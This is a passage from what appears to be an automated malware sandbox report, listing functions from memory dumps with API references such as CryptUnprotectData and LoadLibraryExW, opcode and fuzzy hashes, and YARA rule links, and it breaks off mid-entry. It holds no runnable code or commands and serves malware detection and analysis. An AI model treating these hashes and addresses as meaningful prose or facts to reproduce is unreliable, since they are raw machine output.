                                                • Opcode Fuzzy Hash: 8863aac2e401fc8a9875d35c3af9d6bdb1722068ff3da1c821db8ee9e084e6cd
                                                • Instruction Fuzzy Hash: D2C2AF74F002198FDB189B74C8947AEBBB2EF84350F158965D51AEB390DF34AC86CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011C6AC0, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 011C727D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5630807850.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                Similarity
                                                • API ID: CryptDataUnprotect
                                                • String ID:
                                                • API String ID: 834300711-0
                                                • Opcode ID: 3eaaefaea05a3f6249381c11608b44c408f07e567f2fb6ad17d705ae7709c7f0
                                                • Instruction ID: 04c10d65683e08dd9f3ac4600ed27c5c3c862fb4d60327c5f3facd41d3ae97a6
                                                • Opcode Fuzzy Hash: 3eaaefaea05a3f6249381c11608b44c408f07e567f2fb6ad17d705ae7709c7f0
                                                • Instruction Fuzzy Hash: BF1156768002099FCB10CF99C944BEEBBF5EF48720F148419EA14A7251C374A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E41130, Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: Xk
                                                • API String ID: 0-3738635399
                                                • Opcode ID: b5e0f1850d55fe97ad92df15877218a9adf95e24dab5b6cdcea43dbd47092a2f
                                                • Instruction ID: 0ec82b86bfdb86742cc5f35cc2ece96ef433a71c667c1bb381ee0b7964aef8a6
                                                • Opcode Fuzzy Hash: b5e0f1850d55fe97ad92df15877218a9adf95e24dab5b6cdcea43dbd47092a2f
                                                • Instruction Fuzzy Hash: 1E819338B083289BDF089FB594943BE77B3AFC9304B16C56DE506E7384DE3498469B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1D390040, Relevance: 1.2, Instructions: 1165COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5649538016.000000001D390000.00000040.00000001.sdmp, Offset: 1D390000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 493564d1f386bb64ba267d0ae8c569b0c4cd90f949c754f4b94be633186e7c51
                                                • Instruction ID: 064ec9f0ea10af24bcdd44a0b86a23823f87554edff139d84ce03d76827f5426
                                                • Opcode Fuzzy Hash: 493564d1f386bb64ba267d0ae8c569b0c4cd90f949c754f4b94be633186e7c51
                                                • Instruction Fuzzy Hash: BA92F370B042558FDB18DB78C8547AEBBA2EF85304F258269E509DF391DB74EC41CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01157C90, Relevance: 1.1, Instructions: 1130COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5629794264.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e00759e60d19f94e1e2f11a4c9b988354b1a7b7fa4068ceb5289ddc25c34db3
                                                • Instruction ID: e260f354b97b31b72435222715831bfcb7a77cac300651cb795efff0b2dc2d00
                                                • Opcode Fuzzy Hash: 4e00759e60d19f94e1e2f11a4c9b988354b1a7b7fa4068ceb5289ddc25c34db3
                                                • Instruction Fuzzy Hash: 17A28B70B002188FDB68DB75C8587AE7AF2AF89344F1584A9D91AEF390DF74AC418F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011CB5B0, Relevance: .8, Instructions: 787COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5630807850.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 63dd042a094e7355962e4c91a5ea59c61a5dad26df86b6f408e3f49ea40b5987
                                                • Instruction ID: 49f3c582b45f2ad4a2e3f667965876b23ad1713e13954a1fcc4a03c23de163b3
                                                • Opcode Fuzzy Hash: 63dd042a094e7355962e4c91a5ea59c61a5dad26df86b6f408e3f49ea40b5987
                                                • Instruction Fuzzy Hash: 93721A34E046298FCB24EF78C8547ADB7B2AF89754F1185A9D509AB350EF30AD85CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011CE038, Relevance: .8, Instructions: 762COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5630807850.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f7a293a5eafd98a4146b3edcf8c19ba246e1dff3dde090c3114053ad043f084
                                                • Instruction ID: fa72ba7ce3bfce1bc3c2e0f15030fff05753c70b436a4d69b9bc401ed9fc1e5b
                                                • Opcode Fuzzy Hash: 5f7a293a5eafd98a4146b3edcf8c19ba246e1dff3dde090c3114053ad043f084
                                                • Instruction Fuzzy Hash: 72420430B092148FDB198B79C8546BEBFA6AF95710F06847EE502CB391DB39DC02C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1D395F60, Relevance: .7, Instructions: 742COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5649538016.000000001D390000.00000040.00000001.sdmp, Offset: 1D390000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7fc69066da4bad48ed0ad2b86749e736f17b93b896b00708dbb2c98f44a920b0
                                                • Instruction ID: 7b3d0682893ca21a181e6cf5cb54dbfce47374915a733b77ec307a20f3886d96
                                                • Opcode Fuzzy Hash: 7fc69066da4bad48ed0ad2b86749e736f17b93b896b00708dbb2c98f44a920b0
                                                • Instruction Fuzzy Hash: 24624D74B002288FCB58DB64C8947AEBBB2BF84354F1589A9D509EB350DF34AC86DF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1D39003F, Relevance: .6, Instructions: 586COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5649538016.000000001D390000.00000040.00000001.sdmp, Offset: 1D390000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 86dff9267c139024dc64e23e148b5693f60d19ea768f31c057855e720f23f4e8
                                                • Instruction ID: b4fb63a6b0dad8827c685d0cfa132ee21cc1ba8cf340fdeacc4a326170d9839e
                                                • Opcode Fuzzy Hash: 86dff9267c139024dc64e23e148b5693f60d19ea768f31c057855e720f23f4e8
                                                • Instruction Fuzzy Hash: A332E270F042588FDB18DB74C9447AEBBA2AF85304F25C679D509AF386DB34AC45CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011C2AF0, Relevance: .5, Instructions: 465COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5630807850.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3caeddafd9c56555469e593f5354ef4d1baf7c5b2de24ff5274de2ac793e5112
                                                • Instruction ID: 685e277005354a87628ef67d0aa8bb1b77b7ea8c86e078f3dea416a7ce51f2c5
                                                • Opcode Fuzzy Hash: 3caeddafd9c56555469e593f5354ef4d1baf7c5b2de24ff5274de2ac793e5112
                                                • Instruction Fuzzy Hash: 8302B070B042189FDB18CB68C844BAEBBF2AFC8710F168469E515EB395DB34EC41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011CDA20, Relevance: .5, Instructions: 454COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5630807850.00000000011C0000.00000040.00000001.sdmp, Offset: 011C0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be28a12dac1779bb0a42c79242f1302cbc09064d0fb723dd4e718a90613c3480
                                                • Instruction ID: c2c748cc5a6da91d0ff73298d16f1df7b34c6ad2bb61a93bf00cd32ab991f266
                                                • Opcode Fuzzy Hash: be28a12dac1779bb0a42c79242f1302cbc09064d0fb723dd4e718a90613c3480
                                                • Instruction Fuzzy Hash: 58E1BF30B042145FDB289BB8985476E7AE3AFC5654F16883CE11ADB3D4DF74AC028792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E43A50, Relevance: .3, Instructions: 281COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 82fd327893290c80d3ecfa633f4f25eba199b9e558e6c9c816f2ebb9aeca230b
                                                • Instruction ID: 88f1807c0fcb5001bd85a878bca87633cbe716ed66bd587b9d9b7c18bd638321
                                                • Opcode Fuzzy Hash: 82fd327893290c80d3ecfa633f4f25eba199b9e558e6c9c816f2ebb9aeca230b
                                                • Instruction Fuzzy Hash: 66B14D70E002198FDB10CFB9E8857DEBBF2AF88708F149129D815B7294EB749945CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E44320, Relevance: .3, Instructions: 266COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7e5ea906fe1075be91afc691194c6c4f62cd5c08acaf7e022812eb23df3be981
                                                • Instruction ID: b9305895558f9b31ae61a277a7862178d5668e62601e3f065490b3dffee9875f
                                                • Opcode Fuzzy Hash: 7e5ea906fe1075be91afc691194c6c4f62cd5c08acaf7e022812eb23df3be981
                                                • Instruction Fuzzy Hash: 78B13BB0F002198FDF10CFA9E8817EDBBF2AF88718F159529D815B7294EB749845CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E522E0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,00E52B91,00000800), ref: 00E52C22
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5628223474.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID: &!
                                                • API String ID: 1029625771-172457819
                                                • Opcode ID: f9d60c0cd1acdd55ce494d4f87de43149f4b0fb9d146034f0398a9a3c7136983
                                                • Instruction ID: 63ebe0ab85ac2e6ee43649b55a1a629417dc1cc6f29579b24430544f9162c41d
                                                • Opcode Fuzzy Hash: f9d60c0cd1acdd55ce494d4f87de43149f4b0fb9d146034f0398a9a3c7136983
                                                • Instruction Fuzzy Hash: 3E1114B5D002488FCB20CF9AD444ADEFBF4EB89314F14882EE915B7201C774A949CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46979, Relevance: 2.1, APIs: 1, Instructions: 635libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b4319104daf1a5fa0eb7044a38b140f37a1c4170a560b8deb19f2a6f53bdf244
                                                • Instruction ID: 7ec0fe807c7cadaaf42b26b4f36e42145435f06b10fdf018968091db869aea7b
                                                • Opcode Fuzzy Hash: b4319104daf1a5fa0eb7044a38b140f37a1c4170a560b8deb19f2a6f53bdf244
                                                • Instruction Fuzzy Hash: 616226B4A04228CFCB65EF70C898799B7B6BF89305F2044EAD54AA3744CB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E469C0, Relevance: 2.1, APIs: 1, Instructions: 628libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 709265b39fcfe9f52901a5ccc29316da82cfa6bb1fceac40e28abc8a598741e3
                                                • Instruction ID: c68362426a7ac61a999de6b4f29d31178df8edbd9d5fc24c0a03f73475fe5202
                                                • Opcode Fuzzy Hash: 709265b39fcfe9f52901a5ccc29316da82cfa6bb1fceac40e28abc8a598741e3
                                                • Instruction Fuzzy Hash: 616226B4A44228CFCB65EF70C898799B7B2BF89305F2044EAD54AA3744CB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46A07, Relevance: 2.1, APIs: 1, Instructions: 621libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f83738207d5fac6ee3ea629adacd1734ff1e9c8168f283d81cd362fa5447d8c9
                                                • Instruction ID: a7dd037187f190f20b5d9ec92893f6b13733883e19a3541c58a1151216bdfa9b
                                                • Opcode Fuzzy Hash: f83738207d5fac6ee3ea629adacd1734ff1e9c8168f283d81cd362fa5447d8c9
                                                • Instruction Fuzzy Hash: 575226B4A44228CFCB65EF70C898799B7B2BF89305F2044EAD54AA3744CB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46A4E, Relevance: 2.1, APIs: 1, Instructions: 614libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4b7fc5b534411a4a1940c754247b6038d53a784e99ac1cf93a30ceafa1774e6b
                                                • Instruction ID: 6684cad19f08365e76e83714ae0b69fb62654477ffd85e3ff4710482ba7e7888
                                                • Opcode Fuzzy Hash: 4b7fc5b534411a4a1940c754247b6038d53a784e99ac1cf93a30ceafa1774e6b
                                                • Instruction Fuzzy Hash: FC5226B4A44228CFCB65EF70C898799B7B2BF89305F2044EAD54AA3744CB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46A95, Relevance: 2.1, APIs: 1, Instructions: 607libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3e3a1c005bbc69f01c34e5f495c665043817c536f259effb4162a07b45fb285e
                                                • Instruction ID: 8f6a57b1c8332f3d6ec7ad10cb9e146ae063565ac5d6319a2fdd4b5f24b58763
                                                • Opcode Fuzzy Hash: 3e3a1c005bbc69f01c34e5f495c665043817c536f259effb4162a07b45fb285e
                                                • Instruction Fuzzy Hash: 1C5226B4A44228CFCB65EF70C898799B7B2BF89305F2044EAD54AA3744CB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46ADC, Relevance: 2.1, APIs: 1, Instructions: 600libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8cb94e257e4bc7549006914b25dc9f17f8af844c07a9c413663b7a36dc12f134
                                                • Instruction ID: 5f6fba160377f1745d98f01d12977bf823198d141cbb0ffbf37f204994347f9c
                                                • Opcode Fuzzy Hash: 8cb94e257e4bc7549006914b25dc9f17f8af844c07a9c413663b7a36dc12f134
                                                • Instruction Fuzzy Hash: 4B5226B4A04228CFCB65AF70C89879DB7B2BB89305F2044EAD54AA3744CB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46B23, Relevance: 2.1, APIs: 1, Instructions: 593libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d62c87d3adeccff34c3771cc0a2888bded455c4ca36ccb42b7cfea1a8e67c407
                                                • Instruction ID: 74f0fab6711bd577d2f1358e433a3a2a94fedec4606aa6b20143f0b01fbb781a
                                                • Opcode Fuzzy Hash: d62c87d3adeccff34c3771cc0a2888bded455c4ca36ccb42b7cfea1a8e67c407
                                                • Instruction Fuzzy Hash: 545216B4A44228CFCB65AF70C89879DB7B2BB89305F2044EAD54AA3744CB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46B6A, Relevance: 2.1, APIs: 1, Instructions: 586libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4830ea1caf66040f057f8c70f4dca211a6e78c49ab0f796b1df0c28161b4a623
                                                • Instruction ID: 107526d2f0da2a60fb6212be30d0ff821d2c0cee582e68d988e7da82176e614d
                                                • Opcode Fuzzy Hash: 4830ea1caf66040f057f8c70f4dca211a6e78c49ab0f796b1df0c28161b4a623
                                                • Instruction Fuzzy Hash: 805216B4A44228CFCB65AF70C89879DB7B2BF89305F2044EAD54AA3744CB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46BB1, Relevance: 2.1, APIs: 1, Instructions: 577libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e97a86e5f100f6431e34964fcc5d3ef399c35700df13f6d081a28f4a700ddb56
                                                • Instruction ID: d48304056d4a1db4c4c608d6eb31fbc48957f8808d11c4629e2f1d839ee402bf
                                                • Opcode Fuzzy Hash: e97a86e5f100f6431e34964fcc5d3ef399c35700df13f6d081a28f4a700ddb56
                                                • Instruction Fuzzy Hash: 6C5226B4A44228CFCB65AF70C89879DB7B2BF89305F2044EAD54AA3744CB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46BEF, Relevance: 2.1, APIs: 1, Instructions: 572libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7145af8793c0a5cfdf4968a2ae26c77d93ee0c347a26b7e36fd01b97a163911a
                                                • Instruction ID: bcf166e7e3022bc57e83a08e5509cfbb08ac5f0751381233911db7b3ae104d7d
                                                • Opcode Fuzzy Hash: 7145af8793c0a5cfdf4968a2ae26c77d93ee0c347a26b7e36fd01b97a163911a
                                                • Instruction Fuzzy Hash: 034216B4A04228CFCB65AF70C89879DB7B2BF89305F2044EAD54AA3744CB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46C36, Relevance: 2.1, APIs: 1, Instructions: 565libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b056c1c5f31c443850596e8e6db40ab86915da588f4d4404f920509566406d81
                                                • Instruction ID: 227c220b59cefb8fd2d959e48df09ac7297cb9f26cc7c749696fcfa50d10d09c
                                                • Opcode Fuzzy Hash: b056c1c5f31c443850596e8e6db40ab86915da588f4d4404f920509566406d81
                                                • Instruction Fuzzy Hash: 554216B4A04228CFCB65AF70C89879DB7B2BF89305F2044EAD54AA3744CB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46C7D, Relevance: 2.1, APIs: 1, Instructions: 558libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ef1098e26ca74e80eb126c277f879d6bfb33f304f3a5b63e1b21d20c6b960615
                                                • Instruction ID: c6eee25a5012a0d4243b89a21a9f3cf5f54995408e96e4305bca9f188940ede5
                                                • Opcode Fuzzy Hash: ef1098e26ca74e80eb126c277f879d6bfb33f304f3a5b63e1b21d20c6b960615
                                                • Instruction Fuzzy Hash: 924215B4A44228CFCB65AF70C89879DB7B2BF88305F2044EAD54AA3744DB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46CC4, Relevance: 2.1, APIs: 1, Instructions: 551libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 83384c35b5e7c8b13ee205c3bc9de30b90b64c9cda054e79c8461c3e88decfb3
                                                • Instruction ID: 2780aa110ab8247dfbebe79c802b61658b419602bb45b8606adb7556cddcbd42
                                                • Opcode Fuzzy Hash: 83384c35b5e7c8b13ee205c3bc9de30b90b64c9cda054e79c8461c3e88decfb3
                                                • Instruction Fuzzy Hash: 504215B4A44228CFCB65AF70C89879DB7B2BF88305F2044EAD54AA3744DB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46D0B, Relevance: 2.0, APIs: 1, Instructions: 544libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bcbd7cdbef15df03fbfbd82de03019e79fd5f7a31cb337f7dcb84c1a1db6929a
                                                • Instruction ID: 08b51cd844812d5a0d601746b84f6bc7499595168228625a89e6ca1e653b6795
                                                • Opcode Fuzzy Hash: bcbd7cdbef15df03fbfbd82de03019e79fd5f7a31cb337f7dcb84c1a1db6929a
                                                • Instruction Fuzzy Hash: A64215B4A44228CFCB64AF70C89879DB7B2BF88305F2044EAD54AA3744DB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46D52, Relevance: 2.0, APIs: 1, Instructions: 537libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5c533d9034493740c92ad3692b2957fd45cee9cc1b39d6ad08dafc86bb1c46f2
                                                • Instruction ID: ac1fe085dfa604561ab8b5e06d13772b0702a595deb07aa472e4f61b9f9719b3
                                                • Opcode Fuzzy Hash: 5c533d9034493740c92ad3692b2957fd45cee9cc1b39d6ad08dafc86bb1c46f2
                                                • Instruction Fuzzy Hash: 134206B4A44228CFCB64EF70C89879DB7B6BB88305F2044EAD54AA3744DB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46D99, Relevance: 2.0, APIs: 1, Instructions: 528libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d839d66775f79773d93f0cb774284b6e482261f3bbff8481a5ebfd7a7cb870c2
                                                • Instruction ID: 85acfcf65ec56f16fd905eb25114d291e23d15f40d7ae6704854fb196d07a0a1
                                                • Opcode Fuzzy Hash: d839d66775f79773d93f0cb774284b6e482261f3bbff8481a5ebfd7a7cb870c2
                                                • Instruction Fuzzy Hash: 854206B4A44228CFCB64EF70C89879DB7B6BB88305F2044EAD54AA3744DB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46DD7, Relevance: 2.0, APIs: 1, Instructions: 521libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4c3417f66f054d552a28e9d6c2988eaf8fd4635a272d2480c32d5b079055392e
                                                • Instruction ID: a65b368171a0f1d02331417327799949625e5960e6f3ad7cf105d125b5328306
                                                • Opcode Fuzzy Hash: 4c3417f66f054d552a28e9d6c2988eaf8fd4635a272d2480c32d5b079055392e
                                                • Instruction Fuzzy Hash: B63206B4A44228CFCB64EF70C89879DB7B6BB88305F2044EAD54AA3744DB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46E15, Relevance: 2.0, APIs: 1, Instructions: 516libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3d1398f19684526d2c4432d6bfdf59639e7ced09e4ff37740dd06046120e20a7
                                                • Instruction ID: 41ad8474973de270d4f2ae43bda5618abdbe06446f8865945ad5ef2a86600af5
                                                • Opcode Fuzzy Hash: 3d1398f19684526d2c4432d6bfdf59639e7ced09e4ff37740dd06046120e20a7
                                                • Instruction Fuzzy Hash: EC3206B4A44228CFCB64EF70C89879DB7B6BB88305F2044EAD54AA3744DB359E85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46E5C, Relevance: 2.0, APIs: 1, Instructions: 509libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7c16f1fcd93fbdcd5be14205d3f6a9ece65ce46f2c5fd4d63fd21e418d133809
                                                • Instruction ID: 320ab45340f3c8d0a50b782a9e6fd07ef01d288c9cdac9b6ee394dd2da048b9f
                                                • Opcode Fuzzy Hash: 7c16f1fcd93fbdcd5be14205d3f6a9ece65ce46f2c5fd4d63fd21e418d133809
                                                • Instruction Fuzzy Hash: 203207B4A44228CFCB64EF74C89879DB7B6BB88305F2044EAD54AA3744DB359E85CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46EA3, Relevance: 2.0, APIs: 1, Instructions: 502libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: aa84191fd13beeaab9d8fc1c9161c50268c7fd865f9caa8fee3734946478f2ac
                                                • Instruction ID: 2f05499df990326efc7e93de4def268f1f01bfef8dd3566835a678d04ffe5796
                                                • Opcode Fuzzy Hash: aa84191fd13beeaab9d8fc1c9161c50268c7fd865f9caa8fee3734946478f2ac
                                                • Instruction Fuzzy Hash: 793206B4A44228CFCB64EF74C89879DB7B6BB88305F2044EAD54AA3744DB359E85CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E46EEA, Relevance: 2.0, APIs: 1, Instructions: 495libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.5627838142.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                Similarity
